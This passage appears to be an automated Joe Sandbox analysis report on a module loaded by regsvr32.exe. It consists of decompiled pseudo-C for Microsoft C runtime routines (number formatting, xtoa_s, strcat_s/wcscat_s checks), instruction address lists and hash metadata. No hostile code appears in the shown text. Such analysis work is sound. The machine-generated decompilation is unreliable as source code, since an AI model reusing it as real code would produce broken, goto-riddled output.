                                                  				goto 0xf9d35966;
                                                  				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
                                                  				_v64 = _a16;
                                                  				goto 0xf9d356e9;
                                                  				_v64 = _a24[2] +  *_a16;
                                                  				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
                                                  				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
                                                  				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
                                                  				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                                  				_t175 = _v64;
                                                  				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
                                                  				 *_v64 = _t175;
                                                  				goto 0xf9d35760;
                                                  				E000007FE7FEF9D2CF80(_t175);
                                                  				goto 0xf9d3595a;
                                                  				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
                                                  				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
                                                  				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
                                                  				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                                  				if (_a32[5] != 8) goto 0xf9d35807;
                                                  				if ( *_v64 == 0) goto 0xf9d35807;
                                                  				_t186 = _v64;
                                                  				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
                                                  				 *_v64 = _t186;
                                                  				goto 0xf9d3580e;
                                                  				_t109 = E000007FE7FEF9D2CF80(_t186);
                                                  				goto 0xf9d3595a;
                                                  				_t187 = _a32;
                                                  				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
                                                  				E000007FE7FEF9D2E6A0(_t109, _t187);
                                                  				_v40 = _t187 + _a32[6];
                                                  				goto 0xf9d35845;
                                                  				_v40 = 0;
                                                  				if (_v40 != 0) goto 0xf9d358c6;
                                                  				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
                                                  				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
                                                  				_t191 = _a32[5];
                                                  				_v32 = _a32[5];
                                                  				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                                  				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
                                                  				goto 0xf9d358c1;
                                                  				E000007FE7FEF9D2CF80(_t191);
                                                  				goto 0xf9d3595a;
                                                  				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
                                                  				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
                                                  				_t193 = _a32;
                                                  				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
                                                  				E000007FE7FEF9D2E6A0(_t117, _t193);
                                                  				_v24 = _t193 + _a32[6];
                                                  				goto 0xf9d35922;
                                                  				_v24 = 0;
                                                  				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
                                                  				_t195 = _a32;
                                                  				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
                                                  				_v72 = 2;
                                                  				goto 0xf9d35953;
                                                  				_v72 = 1;
                                                  				goto 0xf9d3595a;
                                                  				E000007FE7FEF9D2CF80(_a32);
                                                  				E000007FE7FEF9D2CF50(_t195);
                                                  				return _v72;
                                                  			}




















                                                  0x7fef9d355f0
                                                  0x7fef9d355f5
                                                  0x7fef9d355fa
                                                  0x7fef9d355ff
                                                  0x7fef9d35608
                                                  0x7fef9d35610
                                                  0x7fef9d3561c
                                                  0x7fef9d3561e
                                                  0x7fef9d35632
                                                  0x7fef9d35637
                                                  0x7fef9d35639
                                                  0x7fef9d35648
                                                  0x7fef9d3564a
                                                  0x7fef9d35656
                                                  0x7fef9d35658
                                                  0x7fef9d3566c
                                                  0x7fef9d35671
                                                  0x7fef9d35673
                                                  0x7fef9d35687
                                                  0x7fef9d35695
                                                  0x7fef9d356a8
                                                  0x7fef9d356ac
                                                  0x7fef9d356c2
                                                  0x7fef9d356c9
                                                  0x7fef9d356ce
                                                  0x7fef9d356e4
                                                  0x7fef9d356f8
                                                  0x7fef9d3570f
                                                  0x7fef9d35722
                                                  0x7fef9d35732
                                                  0x7fef9d35744
                                                  0x7fef9d3574c
                                                  0x7fef9d35756
                                                  0x7fef9d35759
                                                  0x7fef9d3575b
                                                  0x7fef9d35760
                                                  0x7fef9d35774
                                                  0x7fef9d3578f
                                                  0x7fef9d357a2
                                                  0x7fef9d357c1
                                                  0x7fef9d357d6
                                                  0x7fef9d357e1
                                                  0x7fef9d357f2
                                                  0x7fef9d357fa
                                                  0x7fef9d35804
                                                  0x7fef9d35807
                                                  0x7fef9d35809
                                                  0x7fef9d3580e
                                                  0x7fef9d35813
                                                  0x7fef9d3581f
                                                  0x7fef9d35821
                                                  0x7fef9d35835
                                                  0x7fef9d3583a
                                                  0x7fef9d3583c
                                                  0x7fef9d3584b
                                                  0x7fef9d35862
                                                  0x7fef9d35875
                                                  0x7fef9d3587f
                                                  0x7fef9d35883
                                                  0x7fef9d358a0
                                                  0x7fef9d358b5
                                                  0x7fef9d358ba
                                                  0x7fef9d358bc
                                                  0x7fef9d358c1
                                                  0x7fef9d358db
                                                  0x7fef9d358ee
                                                  0x7fef9d358f0
                                                  0x7fef9d358fc
                                                  0x7fef9d358fe
                                                  0x7fef9d35912
                                                  0x7fef9d35917
                                                  0x7fef9d35919
                                                  0x7fef9d3592e
                                                  0x7fef9d35930
                                                  0x7fef9d3593f
                                                  0x7fef9d35941
                                                  0x7fef9d35949
                                                  0x7fef9d3594b
                                                  0x7fef9d35953
                                                  0x7fef9d35955
                                                  0x7fef9d3595c
                                                  0x7fef9d3596a

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                  • String ID:
                                                  • API String ID: 801082872-0
                                                  • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                  • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                                  • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                  • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                  • API String ID: 2123368286-1993839260
                                                  • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                  • Instruction ID: 19a34de06f4f25a15c822aae2b95ff87e4dec291f3645630fab9b4d6ba707880
                                                  • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                  • Instruction Fuzzy Hash: 4AE11836A1CB86CAE7A09B18E84476EB3E1F784345F604525E6CD83BB8DB7ED444CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                  • API String ID: 2123368286-1853640030
                                                  • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                  • Instruction ID: 612b8f3a1e511721bf558c20b5ecc37bcc5fe5373454d887446b2b671354ce2d
                                                  • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                  • Instruction Fuzzy Hash: 2EE13A32A1DB86CAE7A09B59E8447AEB7E1F385344F604125E6CD43BB8DB7ED444CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 22%
                                                  			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                  				signed int _t224;
                                                  				signed char _t229;
                                                  				void* _t260;
                                                  				intOrPtr _t268;
                                                  				signed int _t342;
                                                  				signed int _t343;
                                                  				signed long long _t346;
                                                  				intOrPtr* _t365;
                                                  				intOrPtr* _t370;
                                                  				signed long long _t400;
                                                  
                                                  				_t342 = __rax;
                                                  				_a80 = _a80 | 0x00000040;
                                                  				_a72 = 0xa;
                                                  				_a72 = 0xa;
                                                  				_a116 = 0x10;
                                                  				asm("bts eax, 0xf");
                                                  				_a1220 = 7;
                                                  				_a1220 = 0x27;
                                                  				_a72 = 0x10;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                  				_a84 = 0x30;
                                                  				_a86 = _a1220 + 0x51;
                                                  				_a92 = 2;
                                                  				_a72 = 8;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                  				asm("bts eax, 0x9");
                                                  				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                  				E000007FE7FEF9D31EA0( &_a1560);
                                                  				_a1304 = _t342;
                                                  				goto 0xf9d3e844;
                                                  				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                  				E000007FE7FEF9D31EA0( &_a1560);
                                                  				_a1304 = _t342;
                                                  				goto 0xf9d3e844;
                                                  				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                  				_t343 = E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t343;
                                                  				goto 0xf9d3e807;
                                                  				E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t343;
                                                  				goto 0xf9d3e844;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                  				E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t343;
                                                  				goto 0xf9d3e844;
                                                  				E000007FE7FEF9D31E40( &_a1560);
                                                  				_a1304 = _t343;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                  				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                  				_a1312 =  ~_a1304;
                                                  				asm("bts eax, 0x8");
                                                  				goto 0xf9d3e88b;
                                                  				_t346 = _a1304;
                                                  				_a1312 = _t346;
                                                  				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                  				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                  				_a1312 = _a1312 & _t346;
                                                  				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                  				_a116 = 1;
                                                  				goto 0xf9d3e8ee;
                                                  				_a80 = _a80 & 0xfffffff7;
                                                  				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                  				_a116 = 0x200;
                                                  				if (_a1312 != 0) goto 0xf9d3e901;
                                                  				_a92 = 0;
                                                  				_a64 =  &_a687;
                                                  				_t224 = _a116;
                                                  				_a116 = _a116 - 1;
                                                  				if (_t224 > 0) goto 0xf9d3e92f;
                                                  				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                  				_a1480 = _a72;
                                                  				_a1296 = _t224 / _a1480 + 0x30;
                                                  				_a1488 = _a72;
                                                  				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                  				_t229 = _a1296 + _a1220;
                                                  				_a1296 = _t229;
                                                  				 *_a64 = _a1296 & 0x000000ff;
                                                  				_a64 = _a64 - 1;
                                                  				goto 0xf9d3e90e;
                                                  				_a104 = _t229;
                                                  				_a64 = _a64 + 1;
                                                  				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                  				if (_a104 == 0) goto 0xf9d3ea0b;
                                                  				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                  				_a64 = _a64 - 1;
                                                  				 *_a64 = 0x30;
                                                  				_a104 = _a104 + 1;
                                                  				if (_a108 != 0) goto 0xf9d3ec7c;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                  				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                  				_a84 = 0x2d;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ea9d;
                                                  				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                  				_a84 = 0x2b;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ea9d;
                                                  				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                  				_a84 = 0x20;
                                                  				_a92 = 1;
                                                  				_a1320 = _a88 - _a104 - _a92;
                                                  				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                  				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                  				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                  				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                  				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                  				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                  				if (_a76 != 0) goto 0xf9d3ec29;
                                                  				if (_a104 <= 0) goto 0xf9d3ec29;
                                                  				_t365 = _a64;
                                                  				_a1328 = _t365;
                                                  				_a1336 = _a104;
                                                  				_a1336 = _a1336 - 1;
                                                  				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                  				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                  				_a1496 = _t365;
                                                  				E000007FE7FEF9D26840(_t260,  &_a120);
                                                  				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                                  				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                  				_a1200 = 0xffffffff;
                                                  				goto 0xf9d3ec27;
                                                  				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                  				_a1328 = _a1328 + _a1340;
                                                  				goto 0xf9d3eb61;
                                                  				goto 0xf9d3ec47;
                                                  				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                  				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                  				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                  				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                  				if (_a96 == 0) goto 0xf9d3ec9c;
                                                  				0xf9d25330();
                                                  				_a96 = 0;
                                                  				goto 0xf9d3da75;
                                                  				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                  				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                  				_a1504 = 0;
                                                  				goto 0xf9d3eccd;
                                                  				_a1504 = 1;
                                                  				_t268 = _a1504;
                                                  				_a1344 = _t268;
                                                  				if (_a1344 != 0) goto 0xf9d3ed13;
                                                  				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                  				_a32 = _t370;
                                                  				r9d = 0;
                                                  				r8d = 0x8f5;
                                                  				0xf9d2b3b0();
                                                  				if (_t268 != 1) goto 0xf9d3ed13;
                                                  				asm("int3");
                                                  				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                  				0xf9d2ab30();
                                                  				 *_t370 = 0x16;
                                                  				_a32 = 0;
                                                  				r9d = 0x8f5;
                                                  				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  				_a1376 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				goto 0xf9d3ed8e;
                                                  				_a1380 = _a1200;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  			}













                                                  0x7fef9d3e6c6
                                                  0x7fef9d3e6cd
                                                  0x7fef9d3e6d1
                                                  0x7fef9d3e6de
                                                  0x7fef9d3e6eb
                                                  0x7fef9d3e6f7
                                                  0x7fef9d3e6ff
                                                  0x7fef9d3e70c
                                                  0x7fef9d3e717
                                                  0x7fef9d3e72a
                                                  0x7fef9d3e731
                                                  0x7fef9d3e740
                                                  0x7fef9d3e745
                                                  0x7fef9d3e74f
                                                  0x7fef9d3e762
                                                  0x7fef9d3e768
                                                  0x7fef9d3e77b
                                                  0x7fef9d3e785
                                                  0x7fef9d3e78a
                                                  0x7fef9d3e792
                                                  0x7fef9d3e7a2
                                                  0x7fef9d3e7ac
                                                  0x7fef9d3e7b1
                                                  0x7fef9d3e7b9
                                                  0x7fef9d3e7c7
                                                  0x7fef9d3e7d2
                                                  0x7fef9d3e7e1
                                                  0x7fef9d3e7e5
                                                  0x7fef9d3e7ed
                                                  0x7fef9d3e7f7
                                                  0x7fef9d3e7ff
                                                  0x7fef9d3e807
                                                  0x7fef9d3e812
                                                  0x7fef9d3e81c
                                                  0x7fef9d3e823
                                                  0x7fef9d3e82b
                                                  0x7fef9d3e835
                                                  0x7fef9d3e83c
                                                  0x7fef9d3e84d
                                                  0x7fef9d3e858
                                                  0x7fef9d3e865
                                                  0x7fef9d3e871
                                                  0x7fef9d3e879
                                                  0x7fef9d3e87b
                                                  0x7fef9d3e883
                                                  0x7fef9d3e896
                                                  0x7fef9d3e8a3
                                                  0x7fef9d3e8b8
                                                  0x7fef9d3e8c5
                                                  0x7fef9d3e8c7
                                                  0x7fef9d3e8cf
                                                  0x7fef9d3e8d8
                                                  0x7fef9d3e8e4
                                                  0x7fef9d3e8e6
                                                  0x7fef9d3e8f7
                                                  0x7fef9d3e8f9
                                                  0x7fef9d3e909
                                                  0x7fef9d3e90e
                                                  0x7fef9d3e918
                                                  0x7fef9d3e91e
                                                  0x7fef9d3e929
                                                  0x7fef9d3e934
                                                  0x7fef9d3e957
                                                  0x7fef9d3e963
                                                  0x7fef9d3e990
                                                  0x7fef9d3e9a2
                                                  0x7fef9d3e9a4
                                                  0x7fef9d3e9b8
                                                  0x7fef9d3e9c2
                                                  0x7fef9d3e9c7
                                                  0x7fef9d3e9d9
                                                  0x7fef9d3e9e5
                                                  0x7fef9d3e9f5
                                                  0x7fef9d3e9fc
                                                  0x7fef9d3ea09
                                                  0x7fef9d3ea13
                                                  0x7fef9d3ea1d
                                                  0x7fef9d3ea26
                                                  0x7fef9d3ea2f
                                                  0x7fef9d3ea3e
                                                  0x7fef9d3ea4b
                                                  0x7fef9d3ea52
                                                  0x7fef9d3ea57
                                                  0x7fef9d3ea5f
                                                  0x7fef9d3ea6a
                                                  0x7fef9d3ea71
                                                  0x7fef9d3ea76
                                                  0x7fef9d3ea7e
                                                  0x7fef9d3ea89
                                                  0x7fef9d3ea90
                                                  0x7fef9d3ea95
                                                  0x7fef9d3eaad
                                                  0x7fef9d3eabd
                                                  0x7fef9d3eada
                                                  0x7fef9d3eaf8
                                                  0x7fef9d3eb06
                                                  0x7fef9d3eb11
                                                  0x7fef9d3eb2e
                                                  0x7fef9d3eb38
                                                  0x7fef9d3eb43
                                                  0x7fef9d3eb49
                                                  0x7fef9d3eb4e
                                                  0x7fef9d3eb5a
                                                  0x7fef9d3eb71
                                                  0x7fef9d3eb7a
                                                  0x7fef9d3eb85
                                                  0x7fef9d3eb8a
                                                  0x7fef9d3eb97
                                                  0x7fef9d3ebc9
                                                  0x7fef9d3ebd8
                                                  0x7fef9d3ebda
                                                  0x7fef9d3ebe5
                                                  0x7fef9d3ebff
                                                  0x7fef9d3ec1a
                                                  0x7fef9d3ec22
                                                  0x7fef9d3ec27
                                                  0x7fef9d3ec42
                                                  0x7fef9d3ec4f
                                                  0x7fef9d3ec5a
                                                  0x7fef9d3ec77
                                                  0x7fef9d3ec82
                                                  0x7fef9d3ec8e
                                                  0x7fef9d3ec93
                                                  0x7fef9d3ec9c
                                                  0x7fef9d3eca9
                                                  0x7fef9d3ecb3
                                                  0x7fef9d3ecb5
                                                  0x7fef9d3ecc0
                                                  0x7fef9d3ecc2
                                                  0x7fef9d3eccd
                                                  0x7fef9d3ecd4
                                                  0x7fef9d3ece3
                                                  0x7fef9d3ece5
                                                  0x7fef9d3ecec
                                                  0x7fef9d3ecf1
                                                  0x7fef9d3ecf4
                                                  0x7fef9d3ed06
                                                  0x7fef9d3ed0e
                                                  0x7fef9d3ed10
                                                  0x7fef9d3ed1b
                                                  0x7fef9d3ed1d
                                                  0x7fef9d3ed22
                                                  0x7fef9d3ed28
                                                  0x7fef9d3ed31
                                                  0x7fef9d3ed4c
                                                  0x7fef9d3ed51
                                                  0x7fef9d3ed61
                                                  0x7fef9d3ed6d
                                                  0x7fef9d3ed76
                                                  0x7fef9d3ed82
                                                  0x7fef9d3eda5

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg
                                                  • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 1967237116-1983305044
                                                  • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                  • Instruction ID: 6542cf9ee6a066de1e86aade3174812d6b56db97d2698e01b13d8cfaf3a7b086
                                                  • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                  • Instruction Fuzzy Hash: 20F1E872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                  • API String ID: 2123368286-3477667311
                                                  • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                  • Instruction ID: b03569ffd57b7167c314fdf02ed50a447cb54ce8ebbf145893a20e686b3b9740
                                                  • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                  • Instruction Fuzzy Hash: BFF13832A0DB8685EBE08B19E94476EA3E0F385795F604535D6DE83BA8DF7ED044CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                  • API String ID: 2123368286-1420200500
                                                  • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                  • Instruction ID: c5de73825737ff17a6e05e0685af1bba33d69fc1e3bcf908defeea2cf04d7043
                                                  • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                  • Instruction Fuzzy Hash: A9F15A32A0DB8A89FBA08B14E84576EA7E0F385395FA04535D6DD43BA8DF3ED044CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
